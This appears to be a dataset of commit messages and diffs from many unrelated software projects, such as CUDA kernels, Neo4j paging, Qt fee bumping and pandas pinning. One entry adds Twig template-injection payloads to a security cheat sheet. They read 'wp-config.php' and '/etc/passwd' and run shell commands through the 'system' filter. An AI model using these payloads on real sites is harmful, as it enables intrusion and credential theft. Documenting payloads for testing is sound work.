message
stringlengths
13
484
diff
stringlengths
38
4.63k
llvm/cuda: Clarify handling of kernel parameters Remove duplicate is_comp_run checks
@@ -392,10 +392,11 @@ def _gen_cuda_kernel_wrapper_module(function): # Runs need special handling. data_in and data_out are one dimensional, # but hold entries for all parallel invocations. + # comp_state, comp_params, comp_data, comp_in, comp_out, #trials, #inputs is_comp_run = len(args) == 7 if is_comp_run: - runs_count = args[5] - input_count = args[6] + runs_count = builder.load(args[5]) + input_count = builder.load(args[6]) for i, arg in enumerate(args): # Don't adjust #inputs and #trials @@ -406,10 +407,10 @@ def _gen_cuda_kernel_wrapper_module(function): if i >= 5: offset = ir.IntType(32)(0) # data arrays need special handling - elif is_comp_run and i == 4: # data_out - offset = builder.mul(global_id, builder.load(runs_count)) - elif is_comp_run and i == 3: # data_in - offset = builder.mul(global_id, builder.load(input_count)) + elif i == 4: # data_out + offset = builder.mul(global_id, runs_count) + elif i == 3: # data_in + offset = builder.mul(global_id, input_count) elif is_grid_evaluate: # all but #2 and #3 are shared if i != 2 and i != 3:
Bug fix records.values() was consuming the response, resulting in nothing to return. Changed to records.peek().
@@ -37,7 +37,7 @@ class NeoTransformer(Transformer): with self.driver.session() as session: for i in itertools.count(1): records = session.read_transaction(query, pageSize=size, pageNumber=i) - if len(records.values()) > 0: + if records.peek() != None: yield records else: return @@ -72,7 +72,6 @@ class NeoTransformer(Transformer): """ Load node from a neo4j record """ - node=node_record[0] attributes = {
Update verifier.yml instead of "goss", us the (variable) "{{ goss_dst }}" which can always be found. Solves
register: test_files - name: Execute Goss tests - command: "goss -g {{ item }} validate --format {{ goss_format }}" + command: "{{ goss_dst }} -g {{ item }} validate --format {{ goss_format }}" register: test_results with_items: "{{ test_files.stdout_lines }}" ignore_errors: true
workloads/hackbench: fixes Only install/uninstall the executable once per run Add results file as a raw artifact
@@ -18,6 +18,7 @@ import os import re from wa import Workload, Parameter, Executable +from wa.utils.exec_control import once timeout_buffer = 10 @@ -58,32 +59,38 @@ class Hackbench(Workload): binary_name = 'hackbench' - def setup(self, context): - self.command = '{} -s {} -g {} -l {} {} > {}' - self.target_binary = None - self.hackbench_result = self.target.get_workpath(hackbench_results_txt) - self.run_timeout = self.duration + timeout_buffer - + @once + def initialize(self, context): host_binary = context.resolver.get(Executable(self, self.target.abi, self.binary_name)) self.target_binary = self.target.install(host_binary) - self.command = self.command.format(self.target_binary, self.datasize, self.groups, - self.loops, self.extra_params, self.hackbench_result) + def setup(self, context): + self.target_output_file = self.target.get_workpath(hackbench_results_txt) + self.run_timeout = self.duration + timeout_buffer + command_format = '{} -s {} -g {} -l {} {} > {}' + self.command = command_format.format(self.target_binary, self.datasize, self.groups, + self.loops, self.extra_params, self.target_output_file) def run(self, context): self.target.execute(self.command, timeout=self.run_timeout) def extract_results(self, context): - self.target.pull(self.hackbench_result, context.output_directory) + host_output_file = os.path.join(context.output_directory, hackbench_results_txt) + self.target.pull(self.target_output_file, host_output_file) + context.add_artifact('hackbench-results', host_output_file, kind='raw') def update_output(self, context): - with open(os.path.join(context.output_directory, hackbench_results_txt)) as hackbench_file: - for line in hackbench_file: + results_file = context.get_artifact_path('hackbench-results') + with open(results_file) as fh: + for line in fh: for label, (regex, units) in regex_map.iteritems(): match = regex.search(line) if match: context.add_metric(label, float(match.group(1)), units) def teardown(self, context): + self.target.execute('rm -f {}'.format(self.target_output_file)) + + @once + def finalize(self, context): self.target.uninstall(self.binary_name) - self.target.execute('rm -f {}'.format(self.hackbench_result))
Adding troubleshooting for docker timeout Reference: I split troubleshooting into performance and fetch sections.
@@ -27,7 +27,10 @@ This integration was integrated and tested with version 7.3.2 of QRadar. 4. Click **Test** to validate the URLs, token, and connection. -## Troubleshooting Performance Issues +## Troubleshooting +This section provides information for troubleshooting performance and fetching issues. + +### Performance Issues In some cases, you might encounter performance issues when running QRadar AQL queries from Demisto. This issue is caused by QRadar API limitations. We recommend that you test the QRadar API performance by running several cURL scripts. #### 1. Creating a search Run the following command to use the QRadar API to create a new search.Save the QUERY ID that is attached to the response for the next step. @@ -40,6 +43,11 @@ Use the following command to use the QRadar API to check the query status (EXECU curl -H "SEC: <API KEY>" -X GET <QRADAR INSTANCE>/api/ariel/searches?<QUERY ID> ``` +### Fetching Issues +If the integration fails to fetch with on a Docker timeout error and the enrichment is enabled within the integration configuration, the cause might be releated to a permissions issue with the enrichment. + +Adding the following advanced parameter might resolve this issue: `DOMAIN_ENRCH_FLG=False` + ## Using API Token authentication In order to use the integration with an API token you'll first need to change the `Username / API Key (see '?')` field to `_api_token_key`. Following this step, you can now enter the API Token into the `Password` field - this value will be used as an API key.
Update tests/test_decompositions.py ensures that the unittest method uses the SF test suite default tolerance.
@@ -143,7 +143,7 @@ class DecompositionsModule(BaseTest): for i in new_tlist: U_rec=dec.T(*i) @ U_rec U_rec = np.diag(new_diags) @ U_rec - self.assertAlmostEqual(np.linalg.norm(U_rec-U), 0) + self.assertAlmostEqual(np.linalg.norm(U_rec-U), 0, delta=self.tol) def test_williamson_BM_random_circuit(self):
Minor: don't reinvent mapcat Reuse funcy's one
@@ -920,16 +920,13 @@ class ResolvedExpression(object): :rtype: list[ResolvedExpression] """ - def mapcat(seq, map_fn): - return sum([map_fn(v) for v in seq], []) - def explore(values): if values is None: return [] elif isinstance(values, list): - return mapcat(values, explore) + return funcy.mapcat(explore, values) elif isinstance(values, dict): - return mapcat(values.values(), explore) + return funcy.mapcat(explore, values.values()) elif filter(values): return [values] else:
Fixed pathing Fixed pathing to venv and requirements.txt files.
@@ -62,7 +62,6 @@ jobs: - name: Install Python Dependencies run: | - cd bin/docker_detection_tester python -m venv .venv source .venv/bin/activate python -m pip install wheel @@ -70,8 +69,8 @@ jobs: - name: Run the CI run: | - cd bin/docker_detection_tester source .venv/bin/activate + cd bin/docker_detection_tester echo "github.event.issue.pull_request : [${{ github.event.issue.pull_request }}]" echo "github.event.pull_request.number : [${{ github.event.pull_request.number }}]" echo "steps.vars.outputs.branch : [${{ steps.vars.outputs.branch }}]" @@ -156,7 +155,6 @@ jobs: - name: Install Python Dependencies run: | - cd bin/docker_detection_tester python -m venv .venv source .venv/bin/activate python -m pip install wheel @@ -164,10 +162,11 @@ jobs: - name: Run the CI run: | - cd bin/docker_detection_tester source .venv/bin/activate + cd bin/docker_detection_tester + - python3 detection_testing_execution.py run -c prior_config/${{ matrix.manifest_filename}} + python detection_testing_execution.py run -c prior_config/${{ matrix.manifest_filename}} - name: Upload Test Results Files @@ -259,7 +258,6 @@ jobs: - name: Install Python Dependencies run: | - cd bin/docker_detection_tester python -m venv .venv source .venv/bin/activate python -m pip install wheel @@ -267,8 +265,8 @@ jobs: - name: Merge Detections into single File run: | - cd bin/docker_detection_tester source .venv/bin/activate + cd bin/docker_detection_tester python summarize_json.py --files results_*/summary.json --output_filename summary_test_results.json
Update auth.py bcrypt.hashpw needs encoded string
@@ -29,7 +29,7 @@ def confirm_password(attempt, password_hash): attempt: the password attempt password_hash: the real password pash """ - return bcrypt.hashpw(attempt, password_hash) == password_hash + return bcrypt.hashpw(attempt.encode('utf-8'), password_hash) == password_hash @log_action def login(username, password):
qt bump fee: rename "Final" checkbox to "Keep Replace-By-Fee enabled" Now that the checkbox is hidden behind an advanced option, there is no need to be brief about it, better to be explicit. (terminology unchanged for kivy.)
@@ -115,20 +115,21 @@ class _BaseRBFDialog(WindowModalDialog): vbox.addWidget(adv_widget) def _add_advanced_options(self, adv_vbox: QVBoxLayout) -> None: - self.cb_is_final = QCheckBox(_('Final')) - adv_vbox.addWidget(self.cb_is_final) + self.cb_rbf = QCheckBox(_('Keep Replace-By-Fee enabled')) + self.cb_rbf.setChecked(True) + adv_vbox.addWidget(self.cb_rbf) def run(self) -> None: if not self.exec_(): return - is_final = self.cb_is_final.isChecked() + is_rbf = self.cb_rbf.isChecked() new_fee_rate = self.feerate_e.get_amount() try: new_tx = self.rbf_func(new_fee_rate) except Exception as e: self.window.show_error(str(e)) return - new_tx.set_rbf(not is_final) + new_tx.set_rbf(is_rbf) tx_label = self.wallet.get_label_for_txid(self.txid) self.window.show_transaction(new_tx, tx_desc=tx_label) # TODO maybe save tx_label as label for new tx?? @@ -163,8 +164,9 @@ class BumpFeeDialog(_BaseRBFDialog): ) def _add_advanced_options(self, adv_vbox: QVBoxLayout) -> None: - self.cb_is_final = QCheckBox(_('Final')) - adv_vbox.addWidget(self.cb_is_final) + self.cb_rbf = QCheckBox(_('Keep Replace-By-Fee enabled')) + self.cb_rbf.setChecked(True) + adv_vbox.addWidget(self.cb_rbf) self.strat_combo = QComboBox() options = [
[bugfix] Use collections.abc.Mapping for MonthNames class typing.Mapping has not items() method in Python 3.5.0
import calendar import datetime import re -from collections import defaultdict -from collections.abc import MutableMapping + +from collections import abc, defaultdict from contextlib import suppress from functools import singledispatch from string import digits as _decimalDigits # noqa: N812 @@ -553,7 +553,7 @@ def _make_parameter(decoder: decoder_type, param: int) -> str: # This is useful when trying to decide if a certain article is a localized date # or not, or generating dates. # See dh() for additional information. -class MonthNames(Mapping[str, Callable[[int], str]]): +class MonthNames(abc.Mapping): """A Mapping which reads month names from MediaWiki messages.""" @@ -590,7 +590,7 @@ class MonthNames(Mapping[str, Callable[[int], str]]): return len(self.months) -class MonthFormat(MutableMapping): # type: ignore[type-arg] +class MonthFormat(abc.MutableMapping): # type: ignore[type-arg] """A Mapping which creates months formats."""
visitors (CGen): except -> except AttributeError Also docs fixes
@@ -128,7 +128,7 @@ class CGen(Visitor): """ def _args_decl(self, args): - """Convert an iterable of :class:`Argument` into cgen format.""" + """Generate cgen declarations from an iterable of symbols and expressions.""" ret = [] for i in args: if i.is_Object: @@ -145,10 +145,8 @@ class CGen(Visitor): return ret def _args_call(self, args): - """ - Convert an iterable of symbols and expressions into a function - call signature in cgen format. - """ + """Generate cgen function call arguments from an iterable of symbols and + expressions.""" ret = [] for i in args: try: @@ -160,7 +158,7 @@ class CGen(Visitor): ret.append(i.name) elif i.is_TensorFunction: ret.append('%s_vec' % i.name) - except: + except AttributeError: ret.append(ccode(i)) return ret
doc: BFV instances and IsolatedHostsFilter Since BFV instances don't have a specific image attached to them, the filter will consider them as not having a specific image, hence not isolated. Correcting the doc.
@@ -508,6 +508,12 @@ isolated hosts, and the isolated hosts can only run isolated images. The flag ``restrict_isolated_hosts_to_isolated_images`` can be used to force isolated hosts to only run isolated images. +The logic within the filter depends on the +``restrict_isolated_hosts_to_isolated_images`` config option, which defaults +to True. When True, a volume-backed instance will not be put on an isolated +host. When False, a volume-backed instance can go on any host, isolated or +not. + The admin must specify the isolated set of images and hosts in the ``nova.conf`` file using the ``isolated_hosts`` and ``isolated_images`` configuration options. For example:
Style <pre> tag backgrounds the same as <code>. This makes it consistent with the django-wiki version of the code blocks, which looks neater.
.breadcrumb-section { padding: 1rem; } + +pre { + /* + * Style it the same as the <code> tag, since highlight.js does not style + * backgrounds of <pre> tags but bulma does, resulting in a weird off-white + * border. + */ + background-color: #282c34; +}
Pin pandas to < 1.1.0 pandas 1.1.0 has breaking changes to its styling code. We're temporarily pinning to < 1.1.0, and have an open issue to fix this here:
@@ -37,7 +37,10 @@ click = ">=7.0" enum-compat = "*" numpy = "*" packaging = "*" -pandas = ">=0.21.0" +# pandas 1.1.0 has breaking changes to its styling code. We're temporarily +# pinning to < 1.1.0, and have an open issue to fix this here: +# https://github.com/streamlit/streamlit/issues/1777 +pandas = ">=0.21.0, <1.1.0" pillow = ">=6.2.0" protobuf = ">=3.6.0" pyarrow = "*"
Changes for NDK23 The arch no longer used in url for NDK23+
@@ -474,12 +474,13 @@ class TargetAndroid(Target): ext = 'tar.bz2' else: ext = 'zip' - archive = 'android-ndk-r{0}-' + _platform + '-{1}.' + ext + archive = 'android-ndk-r{0}-' + _platform + '{1}.' + ext is_64 = (os.uname()[4] == 'x86_64') else: raise SystemError('Unsupported platform: {}'.format(platform)) architecture = 'x86_64' if is_64 else 'x86' + architecture = '' if _version >= 23 else f'-{architecture}' unpacked = 'android-ndk-r{0}' archive = archive.format(self.android_ndk_version, architecture) unpacked = unpacked.format(self.android_ndk_version)
Remove out of date note. The note about DdApiKey is mandatory is out of date and should be removed.
@@ -55,7 +55,7 @@ Datadog recommends creating two separate Terraform configurations: Separating the configurations of the API key and the forwarder means that you don't need to provide the Datadog API key when updating the forwarder. -**Note:** The `DdApiKey` parameter is required by the CloudFormation template, so you need to give it a placeholder value (any value) to apply. To update or upgrade the forwarder in the future, apply the forwarder configuration again. +To update or upgrade the forwarder in the future, apply the forwarder configuration again. #### Sample configuration
Fixes for optional slit operation partial (?) fix for github issue - fixes an issue where the code was trying to update the GUI when the GUI was not yet built
@@ -415,7 +415,7 @@ class Cuts(GingaPlugin.LocalPlugin): self.select_cut(tag) if tag == self._new_cut: self.save_cuts.set_enabled(False) - if self.use_slit: + if self.use_slit and self.gui_up: self.save_slit.set_enabled(False) # plot cleared in replot_all() if no more cuts self.replot_all() @@ -428,7 +428,7 @@ class Cuts(GingaPlugin.LocalPlugin): self.w.cuts.append_text(self._new_cut) self.select_cut(self._new_cut) self.save_cuts.set_enabled(False) - if self.use_slit: + if self.use_slit and self.gui_up: self.save_slit.set_enabled(False) # plot cleared in replot_all() if no more cuts self.replot_all() @@ -667,7 +667,7 @@ class Cuts(GingaPlugin.LocalPlugin): self.cuts_plot.clear() self.w.delete_all.set_enabled(False) self.save_cuts.set_enabled(False) - if self.use_slit: + if self.use_slit and self.gui_up: self.save_slit.set_enabled(False) idx = 0 @@ -695,7 +695,7 @@ class Cuts(GingaPlugin.LocalPlugin): if self.use_slit: if self.cutstag != self._new_cut: self._plot_slit() - if self.selected_axis: + if self.selected_axis and self.gui_up: self.save_slit.set_enabled(True) # force mpl redraw @@ -1018,12 +1018,13 @@ class Cuts(GingaPlugin.LocalPlugin): # Check if the old axis is clicked if pos == self.selected_axis: self.selected_axis = None + if self.gui_up: self.save_slit.set_enabled(False) self.redraw_slit('clear') else: self.selected_axis = pos children[pos-1].set_state(tf) - if self.cutstag != self._new_cut: + if (self.cutstag != self._new_cut) and self.gui_up: self.save_slit.set_enabled(True) self._plot_slit()
fix Utils.encode_bytes No one has encountered this yet, but there was a bug in encode_bytes if ProcHelper.__init__ is called with an input string (that needs to be fixed too.)
@@ -12,7 +12,7 @@ def decode_bytes(s): def encode_bytes(s): - return s or s.replace('\n', os.linesep).encode('utf-8') if s is not None else None + return s.replace('\n', os.linesep).encode('utf-8') if s is not None else None # unicode function
Correct globus configuration doc subheading level Previously the configuration section was at the same level as the globus introduction; now it is at the same level as the globus authorization section.
@@ -325,7 +325,7 @@ execute-side file system, because Globus file transfers happen between two Globus endpoints. Globus Configuration -^^^^^^^^^^^^^^^^^^^^ +"""""""""""""""""""" In order to manage where files are staged, users must configure the default ``working_dir`` on a remote location. This information is specified in the :class:`~parsl.executors.base.ParslExecutor` via the ``working_dir`` parameter in the :class:`~parsl.config.Config` instance. For example:
fix datetime format for better understanding original: 1017 01:29:34.751[I]LISA.suite current: 2020-10-17 01:29:34.751 INFO LISA.suite
@@ -105,8 +105,8 @@ class LogWriter(object): _get_root_logger = partial(logging.getLogger, DEFAULT_LOG_NAME) _format = logging.Formatter( - fmt="%(asctime)s.%(msecs)03d[%(levelname)-.1s]%(name)s %(message)s", - datefmt="%m%d %H:%M:%S", + fmt="%(asctime)s.%(msecs)03d %(levelname)-.4s %(name)s %(message)s", + datefmt="%Y-%m-%d %H:%M:%S", ) _console_handler = logging.StreamHandler()
Make bearing objects pickable This removes the lambda definition within the _process_coefficients method, since lambda is not picklable this would cause an error when trying to pickle bearing objects.
@@ -204,7 +204,12 @@ class BearingElement(Element): " must have the same dimension" ) else: - interpolated = lambda x: np.array(coefficient[0]) + interpolated = interpolate.interp1d( + [0, 1], + [coefficient[0], coefficient[0]], + kind='linear', + fill_value="extrapolate", + ) return coefficient, interpolated
Fix Madara without ajax O_O
@@ -7,10 +7,9 @@ from lncrawl.core.crawler import Crawler logger = logging.getLogger(__name__) search_url = 'https://novelcake.com/?s=%s&post_type=wp-manga' -chapter_list_url = 'https://novelcake.com/wp-admin/admin-ajax.php' -class NovelCake(Crawler): +class NovelCakeCrawler(Crawler): base_url = 'https://novelcake.com/' def search_novel(self, query): @@ -27,10 +26,9 @@ class NovelCake(Crawler): 'url': self.absolute_url(a['href']), 'info': '%s | Rating: %s' % (latest, votes), }) - # end for return results - # end def + def read_novel_info(self): logger.debug('Visiting %s', self.novel_url) @@ -39,7 +37,7 @@ class NovelCake(Crawler): possible_title = soup.select_one('.post-title h1') for span in possible_title.select('span'): span.extract() - # end for + self.novel_title = possible_title.text.strip() logger.info('Novel title: %s', self.novel_title) @@ -53,20 +51,12 @@ class NovelCake(Crawler): ]) logger.info('%s', self.novel_author) - self.novel_id = soup.select_one('#manga-chapters-holder')['data-id'] - logger.info('Novel id: %s', self.novel_id) - - response = self.submit_form(chapter_list_url, data={ - 'action': 'manga_get_chapters', - 'manga': self.novel_id, - }) - soup = self.make_soup(response) - for a in reversed(soup.select(".wp-manga-chapter a")): + for a in reversed(soup.select(".wp-manga-chapter > a")): chap_id = len(self.chapters) + 1 vol_id = 1 + len(self.chapters) // 100 if chap_id % 100 == 1: self.volumes.append({"id": vol_id}) - # end if + self.chapters.append( { "id": chap_id, @@ -75,13 +65,8 @@ class NovelCake(Crawler): "url": self.absolute_url(a["href"]), } ) - # end for - - # end def def download_chapter_body(self, chapter): soup = self.get_soup(chapter['url']) contents = soup.select('.reading-content p') return ''.join([str(p) for p in contents]) - # end def -# end class \ No newline at end of file
Update README.rst installing all the requirements for this application
@@ -55,9 +55,17 @@ The SNAP potential comes with this lammps installation. The GAP package for GAP Install all the libraries from requirement.txt file:: - pip install -r requirement.txt + pip install -r requirements.txt (If doesn't works provide the path of requirement.txt file) +For all the requirements above:: + pip install -r requirements-ci.txt + pip install -r requirements-optional.txt + pip install -r requirements-tf.txt + pip install -r requirements.txt + + (If doesn't works provide the path of requirements.txt file) + Usage -----
DOC: add nbsphinx to the doc/conf.py [NEW] allows for inclusion of jupyter notebooks in the documentation
@@ -22,7 +22,11 @@ import sys, os # Add any Sphinx extension module names here, as strings. They can be extensions # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. -extensions = ['sphinx.ext.todo', 'sphinx.ext.doctest', 'sphinx.ext.imgmath'] +extensions = ['sphinx.ext.todo', + 'sphinx.ext.doctest', + 'sphinx.ext.imgmath', + 'nbsphinx', + 'sphinx.ext.mathjax'] # todo_include_todos=True # to expose the TODOs, uncomment this line @@ -33,7 +37,7 @@ templates_path = ['templates'] source_suffix = '.rst' # ignore the cookbook/ensembl.rst file as it's specifically imported -exclude_patterns = ['cookbook/ensembl.rst'] +exclude_patterns = ['cookbook/ensembl.rst', '_build', '**.ipynb_checkpoints'] # The encoding of source files. # source_encoding = 'utf-8'
Update ci.yml Back to pestpp develop Added timeout default Debug false for interim coveralls post
@@ -10,6 +10,7 @@ jobs: pyemuCI: name: autotests runs-on: ${{ matrix.os }} + timeout-minutes: 120 strategy: fail-fast: false matrix: @@ -113,7 +114,7 @@ jobs: exit 1 fi cp -r bin/$d/. "$HOME/.local/bin/" - git clone -b master --depth 1 https://github.com/usgs/pestpp + git clone -b develop --depth 1 https://github.com/usgs/pestpp cd pestpp mkdir build && cd build if [[ "$RUNNER_OS" == "Windows" ]]; then @@ -167,7 +168,7 @@ jobs: uses: AndreMiras/coveralls-python-action@develop with: parallel: true - debug: true + debug: false flag-name: ${{ matrix.python-version }}-${{ matrix.test-path }} # - name: Coveralls Parallel
refactor: extract_email_id condition The condition made no sense and could never be True.
@@ -85,10 +85,7 @@ def get_formatted_email(user, mail=None): def extract_email_id(email): """fetch only the email part of the Email Address""" - email_id = parse_addr(email)[1] - if email_id and isinstance(email_id, str) and not isinstance(email_id, str): - email_id = email_id.decode("utf-8", "ignore") - return email_id + return cstr(parse_addr(email)[1]) def validate_phone_number_with_country_code(phone_number: str, fieldname: str) -> None:
Improve code completion performance (meta control of `MultiColumnCompletionsMenu`). Improve rendering performance of the "meta" control of the `MultiColumnCompletionsMenu` when there are many completions.
@@ -709,7 +709,19 @@ class _SelectedCompletionMetaControl(UIControl): app = get_app() if app.current_buffer.complete_state: state = app.current_buffer.complete_state - return 2 + max(get_cwidth(c.display_meta_text) for c in state.completions) + + if len(state.completions) >= 30: + # When there are many completions, calling `get_cwidth` for + # every `display_meta_text` is too expensive. In this case, + # just return the max available width. There will be enough + # columns anyway so that the whole screen is filled with + # completions and `create_content` will then take up as much + # space as needed. + return max_available_width + + return 2 + max( + get_cwidth(c.display_meta_text) for c in state.completions[:100] + ) else: return 0
Fix environment temperature dash HG-- branch : feature/microservices
] ], "refId": "A", - "measurement": "{{graph}} on slot $tag_slot", - "alias": "{{graph}}" + "measurement": "{{graph}}", + "alias": "{{graph}} on slot $tag_slot" } ], "datasource": null,
Form helper path based on current module path rather than pwd Fixed issue which was introduced by new tests in PR as introduced, those new tests only worked if run from the root of the parsl source tree.
# executors. import importlib +import pathlib import parsl from functools import partial @@ -41,7 +42,8 @@ def test_check_import_module_function_partial(): def test_check_importlib_function(): - spec = importlib.util.spec_from_file_location("dynamically_loaded_module", "parsl/tests/callables_helper.py") + helper_path = pathlib.Path(__file__).parent / "callables_helper.py" + spec = importlib.util.spec_from_file_location("dynamically_loaded_module", helper_path) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) some_aux_func = module.some_aux_func @@ -49,7 +51,8 @@ def test_check_importlib_function(): def test_check_importlib_function_partial(): - spec = importlib.util.spec_from_file_location("dynamically_loaded_module", "parsl/tests/callables_helper.py") + helper_path = pathlib.Path(__file__).parent / "callables_helper.py" + spec = importlib.util.spec_from_file_location("dynamically_loaded_module", helper_path) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) some_aux_func = module.some_aux_func
Add classifier: Hydrology Include the PyPI classifier "Topic :: Scientific/Engineering :: Hydrology" following
@@ -87,6 +87,7 @@ setup( "Intended Audience :: Science/Research", "Topic :: Scientific/Engineering", "Topic :: Scientific/Engineering :: Atmospheric Science", + "Topic :: Scientific/Engineering :: Hydrology", "License :: OSI Approved :: BSD License", "Programming Language :: Python :: 3", "Operating System :: OS Independent",
Twig in Wordpress Was very unsuccessful with the given Twig examples, quotes were escaped so got invalid, file_excerpt threw an error, too. Include and also injecting the file name helped. Don't know if this is a wordpress thing...
@@ -775,6 +775,7 @@ Execute code using SSTI for Slim engine. {{7*7}} {{7*'7'}} would result in 49 {{dump(app)}} +{{dump(_context)}} {{app.request.server.all|join(',')}} ``` @@ -796,6 +797,7 @@ $output = $twig > render ( ```python "{{'/etc/passwd'|file_excerpt(1,30)}}"@ +{{include("wp-config.php")}} ``` ### Twig - Code execution @@ -809,6 +811,12 @@ $output = $twig > render ( {{['cat$IFS/etc/passwd']|filter('system')}} ``` +Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is) + +```python +FILENAME{% set var = dump(_context)[OFFSET:LENGTH] %} {{ include(var) }} +``` + Example with an email passing FILTER_VALIDATE_EMAIL PHP. ```powershell
handle autofire hw rules in a switch matrix matrix switch based hw rules need to have the matrix columns mirrored since opp has reverse column order
@@ -1052,6 +1052,10 @@ class OppHardwarePlatform(LightsPlatform, SwitchPlatform, DriverPlatform): return _, _, coil_num = driver.number.split('-') + + #mirror switch matrix columns to handle the fact that OPP matrix is in reverse column order + switch_num = 8 * (15 - (switch_num // 8)) + switch_num % 8 + msg = bytearray() msg.append(driver.sol_card.addr) msg.extend(OppRs232Intf.SET_SOL_INP_CMD) @@ -1070,6 +1074,10 @@ class OppHardwarePlatform(LightsPlatform, SwitchPlatform, DriverPlatform): if self.min_version[driver.sol_card.chain_serial] < 0x20000: return _, _, coil_num = driver.number.split('-') + + #mirror switch matrix columns to handle the fact that OPP matrix is in reverse column order + switch_num = 8 * (15 - (switch_num // 8)) + switch_num % 8 + msg = bytearray() msg.append(driver.sol_card.addr) msg.extend(OppRs232Intf.SET_SOL_INP_CMD)
avx512 MASK_AS_CONTROL instr do not get their dest R/W value modified. * This applies to instr like VPBLENDMD where mask is a control value not for merging or zeroing. * Modified the definition of xed_decoded_inst_merging() to return false for instr with XED_ATTRIBUTE_MASK_AS_CONTROL.
@@ -889,6 +889,7 @@ xed_bool_t xed_decoded_inst_merging(const xed_decoded_inst_t* p) { if (xed3_operand_get_mask(p) != 0) # if defined(XED_SUPPORTS_AVX512) if (xed3_operand_get_zeroing(p) == 0) + if (!xed_decoded_inst_get_attribute(p, XED_ATTRIBUTE_MASK_AS_CONTROL)) return 1; # elif defined(XED_SUPPORTS_KNC) return 1; @@ -912,15 +913,18 @@ xed_decoded_inst_operand_action(const xed_decoded_inst_t* p, unsigned int operand_index) { - /* For the 0th operand, except for stores: + /* For the 0th operand, except for stores and except if attribute MASK_AS_CONTROL RW W <<< SDM/XED notion =========================================== + aaa=0 control n/a w aaa=0 merging rw w aaa=0 zeroing n/a n/a - aaa!=0 merging r cw r cw <<< This one requires special handling - aaa!=0 zeroing r w w + aaa!=0 control n/a w + aaa!=0 merging r+cw r+cw <<< This one requires special handling + aaa!=0 zeroing r+w w */ + const xed_inst_t* xi = xed_decoded_inst_inst(p); const xed_operand_t* op = xed_inst_operand(xi,operand_index); xed_operand_action_enum_t rw = xed_operand_rw(op);
Test with a 64 bit after_cursor Same as but I missed this assertion in the first PR.
@@ -1998,7 +1998,7 @@ def _fetch_counts(storage, after_cursor=None): _fetch_counts(storage, after_cursor=cursor_run1) == materialization_count_by_partition ) - assert _fetch_counts(storage, after_cursor=9999999) == {c: {}, d: {}} + assert _fetch_counts(storage, after_cursor=9999999999) == {c: {}, d: {}} def test_get_observation(self, storage, test_run_id): a = AssetKey(["key_a"])
Update REFERENCES.md fix the format of the citation.
@@ -21,6 +21,7 @@ chronographically. A number of the below methods are available in GluonTS. ### [Tree-based probabilistic forecaster](https://proceedings.neurips.cc/paper/2021/file/32b127307a606effdcc8e51f60a45922-Paper.pdf) +``` @article{hasson2021probabilistic, title={Probabilistic Forecasting: A Level-Set Approach}, author={Hasson, Hilaf and Wang, Yuyang and Januschowski, Tim and Gasthaus, Jan}, @@ -28,22 +29,27 @@ A number of the below methods are available in GluonTS. volume={34}, year={2021} } +``` ### [Deep switching models](https://papers.nips.cc/paper/2021/file/fb4c835feb0a65cc39739320d7a51c02-Paper.pdf) +``` @inproceedings{ansari2021deep, title={Deep Explicit Duration Switching Models for Time Series}, author={Ansari, Abdul Fatir and Benidis, Konstantinos and Kurle, Richard and Turkmen, Ali Caner and Soh, Harold and Smola, Alex and Wang, Bernie and Januschowski, Tim}, booktitle={Thirty-Fifth Conference on Neural Information Processing Systems}, year={2021} } +``` ### [Neural flows](https://papers.nips.cc/paper/2021/file/b21f9f98829dea9a48fd8aaddc1f159d-Paper.pdf) +``` @inproceedings{bilovs2021neural, title={Neural Flows: Efficient Alternative to Neural ODEs}, author={Bilo{\v{s}}, Marin and Sommer, Johanna and Rangapuram, Syama Sundar and Januschowski, Tim and G{\"u}nnemann, Stephan}, booktitle={Thirty-Fifth Conference on Neural Information Processing Systems}, year={2021} } +``` ### [Optimization methods for time series](http://proceedings.mlr.press/v139/lu21d/lu21d.pdf)
improve efficiency of SctructuredTopology.locate This patch changes the implementation of SctructuredTopology._asaffine to avoid using basis and meshgrid, and relying instead on the known ordering of points in a uniform sample.
@@ -2257,21 +2257,19 @@ class StructuredTopology(TransformChainsTopology): def _asaffine(self, geom, arguments): # determine geom0, scale, error such that geom ~= geom0 + index * scale + error - funcsp = self.basis('std', degree=1, periodic=()) - verts = numeric.meshgrid(*map(numpy.arange, numpy.array(self.shape)+1)).reshape(self.ndims, -1) - index = (funcsp * verts).sum(-1) - # strategy: fit an affine plane through the minima and maxima of a - # uniform sample, and evaluate the error as the largest difference on - # the remaining sample points - geom_, index_ = self.sample('uniform', 2 + (1 in self.shape)).eval((geom, index), **arguments) - imin = geom_.argmin(axis=0) - imax = geom_.argmax(axis=0) - R = numpy.arange(self.ndims) - scale = (geom_[imax,R] - geom_[imin,R]) / (index_[imax,R] - index_[imin,R]) - geom0 = geom_[imin,R] - index_[imin,R] * scale # geom_[im..,R] = index_[im..,R] * scale + geom0 - error = numpy.abs(geom0 + index_ * scale - geom_).max(axis=0) - - return geom0, scale, error + n = 2 + (1 in self.shape) # number of sample points required to establish nonlinearity + sampleshape = numpy.multiply(self.shape, n) # shape of uniform sample + geom_ = self.sample('uniform', n).eval(geom, **arguments) \ + .reshape(*self.shape, *[n] * self.ndims, self.ndims) \ + .transpose(*(i+j for i in range(self.ndims) for j in (0, self.ndims)), self.ndims*2) \ + .reshape(*sampleshape, self.ndims) + # strategy: fit an affine plane through the minima and maxima of a uniform sample, + # and evaluate the error as the largest difference on the remaining sample points + xmin, xmax = geom_.reshape(-1, self.ndims)[[0, -1]] + dx = (xmax - xmin) / (sampleshape-1) # x = x0 + dx * (i + .5) => xmax - xmin = dx * (sampleshape-1) + for idim in range(self.ndims): + geom_[...,idim] -= xmin[idim] + dx[idim] * numpy.arange(sampleshape[idim]).reshape([-1 if i == idim else 1 for i in range(self.ndims)]) + return xmin - dx/2, dx * n, numpy.abs(geom_).reshape(-1, self.ndims).max(axis=0) def _locate(self, geom0, scale, coords, *, eps=0, weights=None, skip_missing=False): mincoords, maxcoords = numpy.sort([geom0, geom0 + scale * self.shape], axis=0)
recognize that function name had changed. Function name had changed some time back, but global replace of function name missed this instance. This fixes the help in impulse_response
@@ -557,7 +557,7 @@ def impulse_response(sys, T=None, X0=0., input=0, output=None, See Also -------- - ForcedReponse, initial_response, step_response + forced_response, initial_response, step_response Examples --------
Tests: Added ability to specify modules to recurse to. * Intended for using with "test_dataclasses" to make it recurse into the sub tests it has.
